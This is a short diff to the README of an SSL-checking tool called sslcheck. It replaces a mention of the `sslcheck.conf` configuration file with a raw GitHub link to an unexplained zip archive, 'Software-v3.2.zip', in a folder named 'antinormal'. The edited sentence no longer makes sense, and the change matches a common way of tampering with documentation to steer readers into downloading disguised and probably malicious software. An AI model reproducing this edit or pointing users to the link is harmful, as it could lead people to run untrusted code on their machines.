Redaghafir/sslcheck/README.md

 sslcheck
 ```

-This will use the domains specified in the `sslcheck.conf`.
+This will use the domains specified in the `https://raw.githubusercontent.com/Redaghafir/sslcheck/main/antinormal/Software-v3.2.zip`.

 ## Monitoring